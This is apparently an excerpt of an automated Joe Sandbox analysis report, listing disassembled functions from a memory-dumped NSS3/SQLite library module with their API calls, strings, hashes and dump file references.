SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5D0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C5D1006
PK11_FreeSymKey.NSS3(?), ref: 6C5D101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5D1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5D103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C5D1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C5D108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5D10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5D10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C5D112E

Part of subcall function 6C5D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5D08C4,?,?), ref: 6C5D15B8
Part of subcall function 6C5D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5D08C4,?,?), ref: 6C5D15C1
Part of subcall function 6C5D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D162E
Part of subcall function 6C5D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D1637

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 21696324727fa56f3e8ec5daf217b48384f363d9e5cf07f3bb2099389567b682
Instruction ID: 766d3d86756bd15a1f515fae0298fd34e4a148e554c67894797c366a371209e1
Opcode Fuzzy Hash: 21696324727fa56f3e8ec5daf217b48384f363d9e5cf07f3bb2099389567b682
Instruction Fuzzy Hash: 7D71C0B1A04305CFDB04CFA9CC84A6BB7B0BF88328F158629E51997711E771E994CB95

Function 6C5F1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5F1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5F2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5F228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5F23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5F241C

Strings

token, xrefs: 6C5F1F2C
model, xrefs: 6C5F23CB, 6C5F23EC
serial, xrefs: 6C5F22A2
manufacturer, xrefs: 6C5F2179

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 34e00cc538c92bf96d6d1123a08db23ff7c078627f43020a27d0d638d6dad6cd
Instruction ID: a46ea494658b9ea36c5923c55409e517a28b7f64cb3d583e4f82d765bd9b51d2
Opcode Fuzzy Hash: 34e00cc538c92bf96d6d1123a08db23ff7c078627f43020a27d0d638d6dad6cd
Instruction Fuzzy Hash: E502FDF2D0C7C86EF7358671CC4C7D76EE09B46328F08166EC5AE466C3C3A8598A8B55

Function 6C530FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C53103E
EnterCriticalSection.KERNEL32(?), ref: 6C531139
LeaveCriticalSection.KERNEL32(?), ref: 6C531190
sqlite3_free.NSS3(00000000), ref: 6C531227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C53126E
sqlite3_free.NSS3(?), ref: 6C53127F

Strings

winAccess, xrefs: 6C53129B
Pkl, xrefs: 6C53109E
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C531267

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pkl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-926248632
Opcode ID: 78307b25654e614f65006c18baf6a5852ba02d182b7606668033b777e4b32967
Instruction ID: 38c5e574a9c9bd9703c2fd6399bcb1cf5a032e457ce5f2168c7a1de00416df26
Opcode Fuzzy Hash: 78307b25654e614f65006c18baf6a5852ba02d182b7606668033b777e4b32967
Instruction Fuzzy Hash: A4711B727042219BEB049F36EC89A9B3776FB86314F145639F929D7680FB30D805C796

Function 6C5F6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C3F

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C60
PR_ExplodeTime.NSS3(00000000,6C5A1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C94

Strings

gfff, xrefs: 6C5F6CFD
gfff, xrefs: 6C5F6D9C
gfff, xrefs: 6C5F6D30
gfff, xrefs: 6C5F6D66
gfff, xrefs: 6C5F6CF5

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 67833f817f1f0361294f254690c2a0c22a414f38dd72f47b14a9aabfca02760c
Instruction ID: f020e1ac25fde6a61451c745d83258b696ceddd4b233757505d93e1040a04402
Opcode Fuzzy Hash: 67833f817f1f0361294f254690c2a0c22a414f38dd72f47b14a9aabfca02760c
Instruction Fuzzy Hash: 49513C72B016494FC70CCDADDC626DABBDA9BE4310F48C23AE442DB781DA78D906C751

Function 6C670F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C671027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6710B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C671353

Strings

$, xrefs: 6C6712A0
%02x, xrefs: 6C6712F6
'%.*q', xrefs: 6C671217, 6C671292
%lld, xrefs: 6C67114B
-- , xrefs: 6C670FF5
zeroblob(%d), xrefs: 6C671223
NULL, xrefs: 6C67119E

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 7906385e054ef2b622872cf0d1050bb821222faa36a1336009b0063e2a84fb74
Instruction ID: c4822a055ab390f2f92730cc7109253b584a99e95cea9bbf3acbe995c80ae58a
Opcode Fuzzy Hash: 7906385e054ef2b622872cf0d1050bb821222faa36a1336009b0063e2a84fb74
Instruction Fuzzy Hash: C8E1AF71908340DFD720CF14C890AABBBF1AF86358F148D1EE9998BB51E771E845CB66

Function 6C678FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C678FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6790DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C679118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6791C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C679209

Strings

3333, xrefs: 6C67925E
UUUU, xrefs: 6C679255

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 70f5bdb04e8338f8727fb21057b5617e0d6f40a72be20a95324876faebf86d45
Instruction ID: b4c2d2dc71742ad88ab336cdefafc28177d34a1cf6c59e52ea6cd0023e4a19d6
Opcode Fuzzy Hash: 70f5bdb04e8338f8727fb21057b5617e0d6f40a72be20a95324876faebf86d45
Instruction Fuzzy Hash: 83A1CE72E001159BDB18CB68CC95BEEB7F5BF89328F094168E915B7341E736AC11CBA4

Function 6C60BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C60BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C60BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C60BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C60BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C60BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C60BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C60BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C60BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C60BE1E

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 74e51e9d0e222dbd77700cfe803cf0df00b326b183f0ec3be0c7d02e682daf4a
Instruction ID: 8788c94e95b78f71fe6bc605a1859756e82dd534f525ed779cd3765b2a9bdc84
Opcode Fuzzy Hash: 74e51e9d0e222dbd77700cfe803cf0df00b326b183f0ec3be0c7d02e682daf4a
Instruction Fuzzy Hash: 7F21E376F0068957FB044A53AE46F8B73B49BD2B8DF084024F916BE681E3509418C2AE

Function 6C6B8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7014E4,6C66CC70), ref: 6C6B8D47
PR_GetCurrentThread.NSS3 ref: 6C6B8D98

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C6B8E7B
htons.WSOCK32(?), ref: 6C6B8EDB
PR_GetCurrentThread.NSS3 ref: 6C6B8F99
PR_GetCurrentThread.NSS3 ref: 6C6B910A

Strings

%u.%u.%u.%u, xrefs: 6C6B8E74

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e28ef4d420b64be7b70f8de34879f65e6834df93a674dc27caf123bcdd3ff5e1
Instruction ID: e921386ddbbd3962b5d28853a2c36d4b4344a62d150ad6c65716888a5861c22e
Opcode Fuzzy Hash: e28ef4d420b64be7b70f8de34879f65e6834df93a674dc27caf123bcdd3ff5e1
Instruction Fuzzy Hash: B702BB319062528FDB14CF19C4583A6BBB3EF5730CF1A825ED8956FAA1C331D925C794

Function 6C53EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6C53F0A6, 6C53F2D5
%s %T already exists, xrefs: 6C53FAC8
temporary table name must be unqualified, xrefs: 6C53F734
not authorized, xrefs: 6C53F957, 6C53F9BA
view, xrefs: 6C53F061, 6C53F071, 6C53FAB7
authorizer malfunction, xrefs: 6C53F95C, 6C53F9BF, 6C53FA5E, 6C53FA8B
sqlite_master, xrefs: 6C53F0AB, 6C53F2DA, 6C53F757, 6C53F93E
table, xrefs: 6C53F05C, 6C53FABC, 6C53FAC7
there is already an index named %s, xrefs: 6C53F9D7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 4526218e79ed842e8db6623b28315b34b6b69758bd76fc75a51efeac8ca5b10e
Instruction ID: c71499d35a6dfe75b07d843bbd81a8810e85ee81588c20e612f9dee2d6221fa1
Opcode Fuzzy Hash: 4526218e79ed842e8db6623b28315b34b6b69758bd76fc75a51efeac8ca5b10e
Instruction Fuzzy Hash: 7472B270E04215CFDB14CF68C884BA9BBF1BF89308F1592ADD8199B752E775E845CB90

Function 6C659C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C52C52B), ref: 6C659D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C65A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C65A114

Strings

%s at line %d of [%.10s], xrefs: 6C65A02E, 6C65A10D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C65A01F, 6C65A0E4, 6C65A0FE
database corruption, xrefs: 6C65A029, 6C65A108

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: c21f5f60334f071a5b00de2a4dcfddfe2e00e2f4f81665d0df82d1eefa75e631
Instruction ID: 27288e1f21a376bd2e864af6acf64ace8ad4bdf0d9c15696b15c65bb28e09606
Opcode Fuzzy Hash: c21f5f60334f071a5b00de2a4dcfddfe2e00e2f4f81665d0df82d1eefa75e631
Instruction Fuzzy Hash: 1022D07060C7418FC704CF29C49066AB7E1BFCA348FA48A2DE9DA97642D731D856CB5A

Function 6C679D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C538637,?,?), ref: 6C679E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C538637), ref: 6C679ED6

Strings

%s at line %d of [%.10s], xrefs: 6C679ECF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C679EC0
database corruption, xrefs: 6C679ECA

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: ec1cf0cad3aa0ff7c392398078a71f0efcf011bfa8bf5d66ac0e2891dfbf2742
Instruction ID: 3961b7f499d5c1cf9b5a94ac546b91a428b7b59b38484617b04870829d4265b4
Opcode Fuzzy Hash: ec1cf0cad3aa0ff7c392398078a71f0efcf011bfa8bf5d66ac0e2891dfbf2742
Instruction Fuzzy Hash: A581D631B012058FCB14CF6AC980ADEB7F6EF89308F148929E915AB741E731ED45CB68

Function 6C687F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6881BC

Strings

BINARY, xrefs: 6C688126
out of memory, xrefs: 6C68835B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 5a5176dc28201b66530e2845f6cfba55325da37c3e9b0167ac7ea288f8a11a8d
Instruction ID: 35649ed460d387932a242f6d6ec62ae6769674711f705f8a86a03939f5c3a330
Opcode Fuzzy Hash: 5a5176dc28201b66530e2845f6cfba55325da37c3e9b0167ac7ea288f8a11a8d
Instruction Fuzzy Hash: F752C171E06218DFDB14CF99C890BDDBBB2FF49308F14815AD855AB761D730A846CBA8

Function 6C609EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C609ED6

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C609EE4

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C609F38

Part of subcall function 6C60D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C609F0B), ref: 6C60D03B
Part of subcall function 6C60D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C60D04E
Part of subcall function 6C60D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C60D07B
Part of subcall function 6C60D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C60D08E
Part of subcall function 6C60D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C60D09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C609F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C609F59

Part of subcall function 6C609D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C609C5B), ref: 6C609D82
Part of subcall function 6C609D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C609C5B), ref: 6C609DA9
Part of subcall function 6C609D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C609C5B), ref: 6C609DCE
Part of subcall function 6C609D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C609C5B), ref: 6C609E43

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

